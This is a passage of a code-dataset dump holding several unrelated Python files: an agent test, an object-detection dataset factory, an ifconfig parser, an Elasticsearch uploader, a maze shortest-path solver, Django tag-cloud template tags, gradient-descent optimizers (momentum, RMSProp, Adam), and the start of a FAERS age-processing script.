\"fet_private_key.txt\")\n wallet = Wallet({FETCHAI: private_key_path})\n ledger_apis = LedgerApis({}, FETCHAI)\n resources = Resources(str(Path(CUR_PATH, \"data\", \"dummy_aea\")))\n identity = Identity(agent_name, address=wallet.addresses[FETCHAI])\n cls.input_file = tempfile.mkstemp()[1]\n cls.output_file = tempfile.mkstemp()[1]\n cls.agent = AEA(\n identity,\n [StubConnection(cls.input_file, cls.output_file)],\n wallet,\n ledger_apis,\n resources,\n is_programmatic=False,\n )\n\n cls.t = Thread(target=cls.agent.start)\n cls.t.start()\n time.sleep(1.0)\n\n def test_add_behaviour_dynamically(self):\n \"\"\"Test the dynamic registration of a behaviour.\"\"\"\n dummy_skill_id = PublicId(\"dummy_author\", \"dummy\", \"0.1.0\")\n dummy_skill = self.agent.resources.get_skill(dummy_skill_id)\n assert dummy_skill is not None\n new_behaviour = DummyBehaviour(\n name=\"dummy2\", skill_context=dummy_skill.skill_context\n )\n dummy_skill.skill_context.new_behaviours.put(new_behaviour)\n time.sleep(1.0)\n assert new_behaviour.nb_act_called > 0\n assert (\n len(self.agent.resources.behaviour_registry.fetch_by_skill(dummy_skill_id))\n == 2\n )\n\n @classmethod\n def teardown_class(cls):\n \"\"\"Tear the class down.\"\"\"\n cls.agent.stop()\n cls.t.join()\n Path(cls.input_file).unlink()\n Path(cls.output_file).unlink()\n","sub_path":"tests/test_aea.py","file_name":"test_aea.py","file_ext":"py","file_size_in_byte":18486,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"515654467","text":"# --------------------------------------------------------\n# Fast R-CNN\n# Copyright (c) 2015 Microsoft\n# Licensed under The MIT License [see LICENSE for details]\n# Written by Ross Girshick\n# --------------------------------------------------------\n\n\"\"\"Factory method for easily getting imdbs by name.\"\"\"\nfrom __future__ import absolute_import\nfrom __future__ import division\nfrom __future__ import print_function\n\nfrom datasets.pascal_voc import pascal_voc\nfrom datasets.coco import coco\nfrom 
datasets.imagenet import imagenet\nfrom datasets.vg import vg\nfrom datasets.food import food\nfrom datasets.food_data import food_merge_imdb\nfrom datasets.school_lunch import school_lunch\nfrom datasets.food_meta_data import food_meta_imdb\n\n__sets = {}\n\nfor canteen in [\"Arts\"]:\n for split in ['train', 'test']:\n name = 'food_meta_{}_{}'.format(canteen, split)\n categories = \"{}_trainval\".format(canteen)\n __sets[name] = (lambda split=split, canteen=canteen:\n food_meta_imdb(split, canteen, categories))\n\n# Set up food___\nsplits = ['train', 'val', 'trainval', 'inner', 'test']\nmt_splits = []\nfor n in [0, 10, 30, 50, 100]:\n for s in splits:\n mt_splits += [s+\"mt{}\".format(n)]\nsplits += mt_splits\n\ninnersplit = []\nfor sp in ['val', 'test']:\n for m in [10, 30, 50]:\n innersplit.append('innermt{}{}'.format(m, sp))\n\nsplits += innersplit\n\n# take few sample in inner between dataset of canteen and dataset of excl canteen as training data. And regard the lefts as validation.\ninner_few = []\nfor fewN in [0, 1, 3, 5, 10]:\n for mtN in [10]:\n for d in ['train', 'val', 'test']:\n inner_few += [\"innerfew{}mt{}{}\".format(fewN, mtN, d)]\nsplits += inner_few\n\nfor cantee in ['exclYIH', \"All\", \"exclArts\", \"exclUTown\", \"Science\", \"exclScience\", \"exclTechChicken\", \"exclTechMixedVeg\", \"YIH\", \"Arts\", \"TechChicken\", \"TechMixedVeg\", \"UTown\", \"EconomicBeeHoon\"]:\n for split in splits:\n for category in ['exclYIH', \"All\", \"exclArts\", \"exclUTown\", \"Science\", \"exclScience\", \"exclTechChicken\", \"exclTechMixedVeg\", \"YIH\", \"Arts\", \"TechChicken\", \"TechMixedVeg\", \"UTown\", \"EconomicBeeHoon\"]:\n category_train = category + '_train'\n name = 'food_{}_{}_{}'.format(cantee, split, category_train)\n __sets[name] = (lambda split=split,\n cantee=cantee, category_train=category_train: food_merge_imdb(split, cantee, category_train))\n for n in [10, 30, 50, 100]:\n category_mt10 = category + '_train_mt{}'.format(n)\n name = 'food_{}_{}_{}'.format(cantee, split, category_mt10)\n __sets[name] = (lambda split=split,\n cantee=cantee, category_mt10=category_mt10: food_merge_imdb(split, cantee, category_mt10))\n\n#__sets[\"Food_EconomicBeeHoon_train\"] = food_meta_imdb(train, )\n\n# Set up school lunch\nfor split in ['train', 'val', 'trainval', 'test']:\n name = 'schoollunch_{}'.format(split)\n __sets[name] = (lambda split=split: school_lunch(split))\n# Set up voc__\nfor year in ['2007', '2012']:\n for split in ['train', 'val', 'trainval', 'test']:\n name = 'voc_{}_{}'.format(year, split)\n __sets[name] = (lambda split=split, year=year: pascal_voc(split, year))\n\n# Set up coco_2014_\nfor year in ['2014']:\n for split in ['train', 'val', 'minival', 'valminusminival', 'trainval']:\n name = 'coco_{}_{}'.format(year, split)\n __sets[name] = (lambda split=split, year=year: coco(split, year))\n\n# Set up coco_2014_cap_\nfor year in ['2014']:\n for split in ['train', 'val', 'capval', 'valminuscapval', 'trainval']:\n name = 'coco_{}_{}'.format(year, split)\n __sets[name] = (lambda split=split, year=year: coco(split, year))\n\n# Set up coco_2015_\nfor year in ['2015']:\n for split in ['test', 'test-dev']:\n name = 'coco_{}_{}'.format(year, split)\n __sets[name] = (lambda split=split, year=year: coco(split, year))\n\n# Set up vg_\n# for version in ['1600-400-20']:\n# for split in ['minitrain', 'train', 'minival', 'val', 'test']:\n# name = 'vg_{}_{}'.format(version,split)\n# __sets[name] = (lambda split=split, version=version: vg(version, split))\nfor version in 
['150-50-20', '150-50-50', '500-150-80', '750-250-150', '1750-700-450', '1600-400-20']:\n    for split in ['minitrain', 'smalltrain', 'train', 'minival', 'smallval', 'val', 'test']:\n        name = 'vg_{}_{}'.format(version, split)\n        __sets[name] = (lambda split=split,\n                        version=version: vg(version, split))\n\n# set up image net.\nfor split in ['train', 'val', 'val1', 'val2', 'test']:\n    name = 'imagenet_{}'.format(split)\n    devkit_path = 'data/imagenet/ILSVRC/devkit'\n    data_path = 'data/imagenet/ILSVRC'\n    __sets[name] = (lambda split=split, devkit_path=devkit_path,\n                    data_path=data_path: imagenet(split, devkit_path, data_path))\n\n\ndef get_imdb(name):\n    \"\"\"Get an imdb (image database) by name.\"\"\"\n    if name not in __sets:\n        raise KeyError('Unknown dataset: {}'.format(name))\n    return __sets[name]()\n\n\ndef list_imdbs():\n    \"\"\"List all registered imdbs.\"\"\"\n    return list(__sets.keys())\n","sub_path":"lib/datasets/factory_.py","file_name":"factory_.py","file_ext":"py","file_size_in_byte":5261,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"}
+{"seq_id":"181340078","text":"#encoding=utf-8\nimport re\nimport commands\ndef ifconf_dict():\n\tcomm='ifconfig'\n\tpattern=r\"\"\"([\\w]+: |inet (?:\\d{1,3}\\.){3}\\d{1,3})\"\"\"\n\t# in ifconfig's output every interface name starts at column 0 and is followed by a colon, and every ip address line starts with inet\n\t# the regular expression above is written from that observation\n\ts=commands.getoutput(comm)\n\t# capture the output of ifconfig\n\tout_put=re.findall(pattern,s)\n\t# the regex returns a list shaped like [interface, ip, interface, ip, ...]\n\tx={}\n\tfor i,j in zip(out_put[::2],out_put[1::2]):\n\t# slice the list into the two alternating halves and pair them up\n\t\tkey=i[:-2]\n\t\tval=j[5:]\n\t\tx[key]=val\n\treturn x\n","sub_path":"ifconfig_reg.py","file_name":"ifconfig_reg.py","file_ext":"py","file_size_in_byte":518,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"}
+{"seq_id":"351883943","text":"# Copyright AlertAvert.com (c) 2017. 
All rights reserved.\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n\n\nimport json\nimport os\n\nimport requests\n\nimport importxls\n\n\nclass ElasticsearchConnector(object):\n HEALTH = \"_cat/health\"\n HEADERS = {'Accept': 'application/json'}\n METADATA_DOCTYPE = \"metadata\"\n\n def __init__(self, index, doctype, host='localhost', port=9200):\n self._url = \"http://{}:{}\".format(host, port)\n self._index = index\n self._doctype = doctype\n\n def upload(self, data):\n \"\"\" Uploads the data to the Elasticsearch server.\n \n :param data: the plants' database\n :type data: list[dict]\n \n :return: None \n \"\"\"\n assert isinstance(data, list)\n\n print(\"Connecting to:\", self._url)\n res = requests.get(\"{}/{}\".format(self._url, ElasticsearchConnector.HEALTH),\n headers=ElasticsearchConnector.HEADERS)\n\n if not res.ok:\n print(\"Server unavailable\")\n return\n\n status = res.json()[0].get('status')\n print(\"Status:\", status)\n if status == 'red':\n print(\"Elasticsearch server is not in a healthy state, aborting uploads\")\n return\n\n print(\"Inserting {} items in the '{}' index\".format(len(data), self._index))\n count = 0\n for item in data:\n if 'botanical_name' not in item:\n continue\n res = requests.post(\"{}/{}/{}\".format(self._url, self._index, self._doctype),\n headers=ElasticsearchConnector.HEADERS, json=item)\n if not res.ok:\n print(\"Failed ({}): {}\".format(res.status_code, res.reason))\n continue\n count += 1\n print(\"SUCCESS {} records uploaded\".format(count))\n\n def upload_metadata(self, upload_id, upload_metadata):\n res = requests.post(\"{}/{}/{}/{}\".format(self._url, self._index,\n ElasticsearchConnector.METADATA_DOCTYPE,\n upload_id),\n headers=ElasticsearchConnector.HEADERS, json=upload_metadata)\n if not res.ok:\n print(\"Failed ({}): {}\".format(res.status_code, res.reason))\n return res.ok\n\n def create_index(self):\n print(\"Creating '{}' index\".format(self._index))\n res = requests.put(\"{}/{}\".format(self._url, self._index))\n if not res.ok:\n print(\"Failed to create the index, aborting\")\n exit(1)\n\n def wipe_index(self):\n print(\"Deleting index {} from Elasticsearch server\".format(self._index))\n requests.delete(\"{}/{}\".format(self._url, self._index))\n\n def rebuild_index(self, local_path, keep=False):\n if not os.path.exists(local_path):\n print(\"File {} does not exist\".format(local_path))\n return\n self.wipe_index()\n data, stats = importxls.import_xls(local_path)\n self.upload(data)\n print(\"Data uploaded from {}\".format(local_path))\n if not keep:\n os.remove(local_path)\n print(\"Data file {} removed\".format(local_path))\n if self.upload_metadata(999, stats):\n return 999\n\n def find_one(self, doc_id):\n return requests.get(\"{}/{}/{}/{}\".format(self._url, self._index, self._doctype, doc_id))\n\n def find_metadata(self, doc_id):\n return requests.get(\"{}/{}/{}/{}\".format(self._url, self._index,\n ElasticsearchConnector.METADATA_DOCTYPE,\n doc_id))\n\n def search_for(self, query):\n return 
requests.post(\"{}/{}/_search\".format(self._url, self._index),\n                             data=json.dumps(query))\n","sub_path":"elasticsearch_connector.py","file_name":"elasticsearch_connector.py","file_ext":"py","file_size_in_byte":4317,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"}
+{"seq_id":"179058484","text":"# -*- encoding: utf-8 -*-\nimport sys\nimport heapq\nr_input = sys.stdin.readline\n\nN, M = map(int, r_input().split()) # size of the maze\n\nmaze = {}\ncost = {}\n\ndx = [0, 1, -1, 0]\ndy = [1, 0, 0, -1]\n\nfor i in range(M):\n    maze[i] = []\n\n    for c in r_input().rstrip():\n        maze[i].append(int(c))\n\n    cost[i] = ['INF'] * N\n\ncost[0][0] = 0\n\nif M == 1:\n    print(maze[0].count(1))\n    exit()\n\nif N == 1:\n    total = 0\n    for i in range(M):\n        total += maze[i][0]\n    print(total)\n    exit()\n\nqueue = []\n\nfor i in range(2):\n    heapq.heappush(queue, (maze[dx[i]][dy[i]], dx[i], dy[i]))\n    cost[dx[i]][dy[i]] = maze[dx[i]][dy[i]]\n\n\ndef dijkstra():\n    while queue:\n        mini = heapq.heappop(queue)\n        min_cost = mini[0]\n        min_x = mini[1]\n        min_y = mini[2]\n\n        for i in range(4):\n            tmp_x = min_x + dx[i]\n            tmp_y = min_y + dy[i]\n\n            if 0 <= tmp_x < M and 0 <= tmp_y < N:\n                tmp_cost = min_cost + maze[tmp_x][tmp_y]\n\n                if cost[tmp_x][tmp_y] == 'INF' or tmp_cost < cost[tmp_x][tmp_y]:\n                    cost[tmp_x][tmp_y] = tmp_cost\n                    heapq.heappush(queue, (tmp_cost, tmp_x, tmp_y))\n\n\ndijkstra()\n\nprint(cost[M-1][N-1])\n","sub_path":"Algorithm/Baekjoon/01261 알고스팟/1261.py","file_name":"1261.py","file_ext":"py","file_size_in_byte":1226,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"}
+{"seq_id":"381392636","text":"from django import template\nfrom django.db.models import Count\nfrom django.core.exceptions import FieldError\nfrom django.db.models.loading import get_model\n\nfrom templatetag_sugar.register import tag\nfrom templatetag_sugar.parser import Variable, Optional, Model, Required\n\nfrom taggit import VERSION as TAGGIT_VERSION\nfrom taggit_templatetags import settings\n\nT_MAX = getattr(settings, 'TAGCLOUD_MAX', 6.0)\nT_MIN = getattr(settings, 'TAGCLOUD_MIN', 1.0)\n\nregister = template.Library()\n\ndef get_queryset(forvar=None):\n    count_field = None\n    if forvar is None:\n        # get all tags\n        # tagged_things = settings.TAGGED_ITEM_MODEL.objects.all().distinct\n        queryset = settings.TAG_MODEL.objects.all()\n    else:\n        # extract app label and model name\n        beginning, applabel, model = None, None, None\n        try:\n            beginning, applabel, model = forvar.rsplit('.', 2)\n        except ValueError:\n            try:\n                applabel, model = forvar.rsplit('.', 1)\n            except ValueError:\n                applabel = forvar\n        applabel = applabel.lower()\n        \n        # filter tagged items \n        if model is None:\n            # Get tags for a whole app\n            queryset = settings.TAGGED_ITEM_MODEL.objects.filter(content_type__app_label=applabel)\n            tag_ids = queryset.values_list('tag_id', flat=True)\n            queryset = settings.TAG_MODEL.objects.filter(id__in=tag_ids)\n        else:\n            # Get tags for a model\n            model = model.lower()\n            if \":\" in model:\n                model, manager_attr = model.split(\":\", 1)\n            else:\n                manager_attr = \"tags\"\n            model_class = get_model(applabel, model)\n            manager = getattr(model_class, manager_attr)\n            queryset = manager.all()\n            through_opts = manager.through._meta\n            count_field = (\"%s_%s_items\" % (through_opts.app_label,\n                through_opts.object_name)).lower() #old style\n\n    if count_field is None:\n        # if \n        relname = settings.TAGGED_ITEM_MODEL._meta.get_field_by_name('tag')[0].rel.related_name\n        return queryset.annotate(num_times=Count(relname))\n    
else:\n return queryset.annotate(num_times=Count(count_field))\n\n\n\ndef get_weight_fun(t_min, t_max, f_min, f_max):\n def weight_fun(f_i, t_min=t_min, t_max=t_max, f_min=f_min, f_max=f_max):\n # Prevent a division by zero here, found to occur under some\n # pathological but nevertheless actually occurring circumstances.\n if f_max == f_min:\n mult_fac = 1.0\n else:\n mult_fac = float(t_max-t_min)/float(f_max-f_min)\n \n return t_max - (f_max-f_i)*mult_fac\n return weight_fun\n\n@tag(register, {Required('asvar'): Variable(), Optional('for_obj'): Variable(), Optional('count'): Variable()}) \ndef get_taglist(context, asvar, for_obj=None, count=None):\n # print asvar\n # print for_obj\n # print count\n queryset = get_queryset(for_obj) \n queryset = queryset.order_by('-num_times') \n if count:\n context[asvar] = queryset[:int(count)]\n else:\n context[asvar] = queryset\n \n return ''\n\n@tag(register, {Optional('as'): Variable(), Optional('for'): Variable(), Optional('count'): Variable()})\ndef get_tagcloud(context, asvar=None, forvar=None, count=None):\n queryset = get_queryset(forvar)\n num_times = queryset.values_list('num_times', flat=True)\n if(len(num_times) == 0):\n context[asvar] = queryset\n return ''\n weight_fun = get_weight_fun(T_MIN, T_MAX, min(num_times), max(num_times))\n if count:\n queryset = queryset.order_by('name')[:int(count)-1]\n else:\n queryset = queryset.order_by('name')\n for tag in queryset:\n tag.weight = weight_fun(tag.num_times)\n context[asvar] = queryset\n return ''\n \ndef include_tagcloud(forvar=None):\n return {'forvar': forvar}\n\ndef include_taglist(forvar=None):\n return {'forvar': forvar}\n \nregister.inclusion_tag('taggit_templatetags/taglist_include.html')(include_taglist)\nregister.inclusion_tag('taggit_templatetags/tagcloud_include.html')(include_tagcloud)\n","sub_path":"taggit_templatetags/templatetags/taggit_extras.py","file_name":"taggit_extras.py","file_ext":"py","file_size_in_byte":4184,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"228377250","text":"import os\n\nimport matplotlib.pyplot as plt\nimport numpy as np\n\n# import local modules\nfrom coding_deep_neural_network_from_scratch import (initialize_parameters,\n L_model_forward,\n compute_cost,\n L_model_backward,\n update_parameters,\n accuracy)\n\n\ndef random_mini_batches(X, Y, mini_batch_size=64, seed=0):\n \"\"\"\n Creates a list of random minibatches from (X, Y)\n\n Arguments:\n X -- input data, shape: input size, number of examples\n Y -- \"label\" vector, shape: 1, number of examples\n mini_batch_size -- size of the mini-batches, integer\n\n Returns:\n mini_batches -- list of synchronous (mini_batch_X, mini_batch_Y)\n \"\"\"\n np.random.seed(seed)\n m = X.shape[1]\n mini_batches = []\n\n # shuffle training set\n permutation = np.random.permutation(m)\n shuffle_X = X[:, permutation]\n shuffle_Y = Y[:, permutation]\n\n num_complete_minibatches = m // mini_batch_size\n\n for k in range(num_complete_minibatches):\n mini_batch_X = shuffle_X[:, k*mini_batch_size:(k + 1)*mini_batch_size]\n mini_batch_Y = shuffle_Y[:, k*mini_batch_size:(k + 1)*mini_batch_size]\n mini_batch = (mini_batch_X, mini_batch_Y)\n mini_batches.append(mini_batch)\n\n # check if there are some examples left if m % batch_size != 0\n if m % mini_batch_size != 0:\n mini_batch_X = shuffle_X[:, num_complete_minibatches*mini_batch_size:]\n mini_batch_Y = shuffle_Y[:, num_complete_minibatches*mini_batch_size:]\n mini_batch = (mini_batch_X, mini_batch_Y)\n 
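# worked example: m = 1000 and mini_batch_size = 64 give 1000 // 64 = 15\n        # full batches covering 960 examples; this final batch holds the\n        # remaining 40\n        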
mini_batches.append(mini_batch)\n\n    return mini_batches\n\n\ndef initialize_momentum(parameters):\n    \"\"\"\n    Initializes the velocity as a python dictionary with:\n                - keys: \"dW1\", \"db1\", ..., \"dWL\", \"dbL\"\n                - values: numpy arrays of zeros of the same shape as the\n                  corresponding gradients/parameters.\n\n    Arguments:\n    parameters -- python dictionary containing parameters.\n\n    Returns:\n    v -- python dictionary containing the current velocity.\n    \"\"\"\n    L = len(parameters) // 2\n    v = {}\n\n    for l in range(1, L + 1):\n        v[\"dW\" + str(l)] = np.zeros_like(parameters[\"W\" + str(l)])\n        v[\"db\" + str(l)] = np.zeros_like(parameters[\"b\" + str(l)])\n\n    return v\n\n\ndef update_parameters_with_momentum(parameters, grads, v, beta, learning_rate):\n    \"\"\"\n    Update parameters using Momentum\n\n    Arguments:\n    parameters -- python dictionary containing your parameters:\n    grads -- python dictionary containing your gradients for each parameters:\n    v -- python dictionary containing the current velocity:\n    beta -- the momentum hyperparameter --> scalar\n    learning_rate -- the learning rate --> scalar\n\n    Returns:\n    parameters -- python dictionary containing your updated parameters\n    v -- python dictionary containing your updated velocities\n    \"\"\"\n    L = len(parameters) // 2\n\n    for l in range(1, L + 1):\n        # update momentum velocity\n        v[\"dW\" + str(l)] =\\\n            beta * v[\"dW\" + str(l)] + (1 - beta) * grads[\"dW\" + str(l)]\n        v[\"db\" + str(l)] =\\\n            beta * v[\"db\" + str(l)] + (1 - beta) * grads[\"db\" + str(l)]\n        # update parameters\n        parameters[\"W\" + str(l)] =\\\n            parameters[\"W\" + str(l)] - learning_rate * v[\"dW\" + str(l)]\n        parameters[\"b\" + str(l)] =\\\n            parameters[\"b\" + str(l)] - learning_rate * v[\"db\" + str(l)]\n\n    return parameters, v\n\n\ndef initialize_rmsprop(parameters):\n    \"\"\"\n    Initializes the squared-gradient average as a python dictionary with:\n                - keys: \"dW1\", \"db1\", ..., \"dWL\", \"dbL\"\n                - values: numpy arrays of zeros of the same shape as the\n                  corresponding gradients/parameters.\n\n    Arguments:\n    parameters -- python dictionary containing parameters.\n\n    Returns:\n    s -- python dictionary containing the current squared-gradient average.\n    \"\"\"\n    L = len(parameters) // 2\n    s = {}\n\n    for l in range(1, L + 1):\n        s[\"dW\" + str(l)] = np.zeros_like(parameters[\"W\" + str(l)])\n        s[\"db\" + str(l)] = np.zeros_like(parameters[\"b\" + str(l)])\n\n    return s\n\n\ndef update_parameters_with_rmsprop(parameters, grads, s, beta, learning_rate,\n                                   epsilon=1e-8):\n    \"\"\"\n    Update parameters using RMSProp\n\n    Arguments:\n    parameters -- python dictionary containing parameters:\n    grads -- python dictionary containing gradients for each parameters:\n    s -- python dictionary containing the current squared-gradient average:\n    beta -- the RMSProp decay hyperparameter --> scalar\n    learning_rate -- the learning rate --> scalar\n    epsilon -- hyperparameter preventing division by zero in RMSProp updates\n\n    Returns:\n    parameters -- python dictionary containing your updated parameters\n    s -- python dictionary containing updated squared-gradient averages\n    \"\"\"\n    L = len(parameters) // 2\n\n    for l in range(1, L + 1):\n        # update squared-gradient moving average\n        s[\"dW\" + str(l)] =\\\n            beta * s[\"dW\" + str(l)] +\\\n            (1 - beta) * np.square(grads[\"dW\" + str(l)])\n        s[\"db\" + str(l)] =\\\n            beta * s[\"db\" + str(l)] +\\\n            (1 - beta) * np.square(grads[\"db\" + str(l)])\n        # update parameters\n        parameters[\"W\" + str(l)] -= (learning_rate * grads[\"dW\" + str(l)])\\\n            / (np.sqrt(s[\"dW\" + str(l)] + epsilon))\n        parameters[\"b\" + str(l)] -= (learning_rate * grads[\"db\" + str(l)])\\\n            / (np.sqrt(s[\"db\" + str(l)] + epsilon))\n\n    return parameters, s\n\n\n
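# --- Added sketch (not part of the original record): the momentum rule above as a
# scalar example with hypothetical values. With beta=0.9 and a constant gradient of
# 0.5, the velocity warms up toward the raw gradient over successive steps.
v_demo, beta_demo = 0.0, 0.9
for grad_demo in (0.5, 0.5, 0.5):
    v_demo = beta_demo * v_demo + (1 - beta_demo) * grad_demo  # 0.05, 0.095, 0.1355
# a parameter update would then subtract learning_rate * v_demo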
def initialize_adam(parameters):\n    \"\"\"\n    Initializes v and s as two python dictionaries with:\n                - keys: \"dW1\", \"db1\", ..., \"dWL\", \"dbL\"\n                - values: numpy arrays of zeros of the same shape as the\n                  corresponding gradients/parameters.\n\n    Arguments:\n    parameters -- python dictionary containing your parameters.\n\n    Returns:\n    v -- python dictionary that will contain the exponentially weighted\n         average of the gradient.\n    s -- python dictionary that will contain the exponentially weighted\n         average of the squared gradient.\n    \"\"\"\n    L = len(parameters) // 2\n    v = {}\n    s = {}\n\n    for l in range(1, L + 1):\n        v[\"dW\" + str(l)] = np.zeros_like(parameters[\"W\" + str(l)])\n        v[\"db\" + str(l)] = np.zeros_like(parameters[\"b\" + str(l)])\n        s[\"dW\" + str(l)] = np.zeros_like(parameters[\"W\" + str(l)])\n        s[\"db\" + str(l)] = np.zeros_like(parameters[\"b\" + str(l)])\n\n    return v, s\n\n\ndef update_parameters_with_adam(parameters, grads, v, s, t, learning_rate,\n                                beta1=0.9, beta2=0.999, epsilon=1e-8):\n    \"\"\"\n    Update parameters using Adam\n\n    Arguments:\n    parameters -- python dictionary containing parameters:\n    grads -- python dictionary containing gradients for each parameters:\n    v -- Adam variable, moving average of the first gradient\n    s -- Adam variable, moving average of the squared gradient\n    t -- step counter used for the bias correction\n    learning_rate -- the learning rate, scalar.\n    beta1 -- Exponential decay hyperparameter for the first moment estimates\n    beta2 -- Exponential decay hyperparameter for the second moment estimates\n    epsilon -- hyperparameter preventing division by zero in Adam updates\n\n    Returns:\n    parameters -- python dictionary containing updated parameters\n    v -- Adam variable, moving average of the first gradient\n    s -- Adam variable, moving average of the squared gradient\n    \"\"\"\n    L = len(parameters) // 2\n    v_corrected = {}\n    s_corrected = {}\n\n    for l in range(1, L + 1):\n        # update the moving average of both the first gradient and the squared gradient\n        v[\"dW\" + str(l)] = beta1 * v[\"dW\" + str(l)] +\\\n            (1 - beta1) * grads[\"dW\" + str(l)]\n        v[\"db\" + str(l)] = beta1 * v[\"db\" + str(l)] +\\\n            (1 - beta1) * grads[\"db\" + str(l)]\n        s[\"dW\" + str(l)] = beta2 * s[\"dW\" + str(l)] +\\\n            (1 - beta2) * np.square(grads[\"dW\" + str(l)])\n        s[\"db\" + str(l)] = beta2 * s[\"db\" + str(l)] + \\\n            (1 - beta2) * np.square(grads[\"db\" + str(l)])\n\n        # compute the bias-corrected estimate of the moving averages\n        v_corrected[\"dW\" + str(l)] = v[\"dW\" + str(l)] / (1 - beta1**t)\n        v_corrected[\"db\" + str(l)] = v[\"db\" + str(l)] / (1 - beta1**t)\n        s_corrected[\"dW\" + str(l)] = s[\"dW\" + str(l)] / (1 - beta2**t)\n        s_corrected[\"db\" + str(l)] = s[\"db\" + str(l)] / (1 - beta2**t)\n\n        # update parameters\n        parameters[\"W\" + str(l)] -= (\n            learning_rate * v_corrected[\"dW\" + str(l)])\\\n            / (np.sqrt(s_corrected[\"dW\" + str(l)] + epsilon))\n        parameters[\"b\" + str(l)] -= (\n            learning_rate * v_corrected[\"db\" + str(l)])\\\n            / (np.sqrt(s_corrected[\"db\" + str(l)] + epsilon))\n\n    return parameters, v, s\n\n\n
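# --- Added sketch (not part of the original record): why update_parameters_with_adam
# divides by (1 - beta**t). Values are hypothetical. At step t=1 with beta1=0.9 the
# raw moving average is only 10% of the gradient; the correction restores its scale.
beta1_demo, grad_demo, t_demo = 0.9, 0.5, 1
v_demo = beta1_demo * 0.0 + (1 - beta1_demo) * grad_demo  # 0.05, biased toward zero
v_corrected_demo = v_demo / (1 - beta1_demo ** t_demo)    # 0.05 / 0.1 = 0.5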
def model(X, Y, layers_dims, optimizer=\"adam\", learning_rate=0.01,\n          mini_batch_size=64, beta=0.9, beta1=0.9, beta2=0.999, epsilon=1e-8,\n          num_epochs=3000, print_cost=True, activation_fn=\"relu\"):\n    \"\"\"\n    Implements a multi-layer neural network model which can be run in different\n    optimizer modes.\n\n    Arguments:\n    X -- input data, shape: number of features, number of examples\n    Y -- label vector, shape: 1, number of examples\n    layers_dims -- python list, containing the size of each layer\n    optimizer -- \"mb\", \"momentum\", \"rmsprop\", or \"adam\".\n    learning_rate -- the learning rate --> scalar.\n    mini_batch_size -- the size of a mini batch\n    beta -- Momentum/RMSProp hyperparameter\n    beta1 -- Exponential decay hyperparameter for the past gradients\n    beta2 -- Exponential decay hyperparameter for the past squared gradients\n    epsilon -- hyperparameter preventing division by zero\n    num_epochs -- number of epochs\n    print_cost -- True to print the cost every 1000 epochs\n    activation_fn -- function to be used on hidden layers: \"relu\", or \"tanh\"\n\n    Returns:\n    parameters -- python dictionary containing updated parameters\n    \"\"\"\n    # set random seed to get consistent output\n    seed = 1\n    np.random.seed(seed)\n\n    # initialize parameters\n    parameters = initialize_parameters(layers_dims)\n\n    # initialize moving averages based on optimizer modes\n    assert(optimizer == \"mb\" or optimizer == \"momentum\" or\n           optimizer == \"rmsprop\" or optimizer == \"adam\")\n\n    if optimizer == \"momentum\":\n        v = initialize_momentum(parameters)\n\n    elif optimizer == \"rmsprop\":\n        s = initialize_rmsprop(parameters)\n\n    elif optimizer == \"adam\":\n        v, s = initialize_adam(parameters)\n        t = 0\n\n    # initialize costs list\n    costs = []\n\n    # iterate over number of epochs\n    for epoch in range(num_epochs):\n        # split the training data into mini batches\n        seed += 1\n        mini_batches = random_mini_batches(X, Y, mini_batch_size, seed=seed)\n\n        # iterate over mini batches\n        for mini_batch in mini_batches:\n            mini_batch_X, mini_batch_Y = mini_batch\n\n            # compute fwd prop\n            AL, caches = L_model_forward(\n                mini_batch_X, parameters, activation_fn)\n\n            # compute cost\n            cost = compute_cost(AL, mini_batch_Y)\n\n            # compute gradients\n            grads = L_model_backward(AL, mini_batch_Y, caches, activation_fn)\n\n            # update parameters\n            if optimizer == \"mb\":\n                parameters = update_parameters(\n                    parameters, grads, learning_rate)\n\n            elif optimizer == \"momentum\":\n                parameters, v = update_parameters_with_momentum(\n                    parameters, grads, v, beta, learning_rate)\n\n            elif optimizer == \"rmsprop\":\n                parameters, s = update_parameters_with_rmsprop(\n                    parameters, grads, s, beta, learning_rate, epsilon)\n\n            elif optimizer == \"adam\":\n                t += 1\n                parameters, v, s = update_parameters_with_adam(\n                    parameters, grads, v, s, t, learning_rate, beta1, beta2,\n                    epsilon)\n\n        # compute epoch cost on the full training set (fixed: the original\n        # referenced undefined X_train/Y_train here)\n        AL, caches = L_model_forward(\n            X, parameters, activation_fn)\n        cost = compute_cost(AL, Y)\n\n        if epoch % 100 == 0:\n            costs.append(cost)\n\n    # plot the cost\n    plt.plot(costs)\n    plt.ylabel('Cost')\n    plt.xlabel('Epochs (per hundreds)')\n    plt.title(\"Learning rate = \" + str(learning_rate))\n    plt.show()\n\n    return parameters\n","sub_path":"scripts/optimization_algorithms.py","file_name":"optimization_algorithms.py","file_ext":"py","file_size_in_byte":12598,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"301797535","text":"# -*- coding:utf-8 -*-\n# Compute AGE_TYPE from the DEMO tables and write it back to the database\nimport time\nimport pyodbc\nimport configparser\n\ndb_name = \"FAERS\"\n\nselect_age = \"SELECT PRIMARYID, AGE, AGE_COD FROM {0};\"\nget_columns = \"SELECT Name FROM SysColumns WHERE id=Object_Id('{0}')\"\nadd_type_column = \"ALTER TABLE {0} ADD AGE_TYPE tinyint;\"\nupdate_age_type = \"UPDATE {0} SET AGE_TYPE = {1} WHERE PRIMARYID = {2}\"\n\n\ndef get_age_type(age_data):\n    \"\"\"Compute AGE_TYPE from the input AGE and AGE_COD.\n    \"\"\"\n    age, age_cod = age_data\n    if age == None or age_cod == None:\n        return None\n    # Units from smallest to largest: e.g., an AGE_COD of seconds (SEC) is first converted to minutes (MIN) and eventually ends up in years 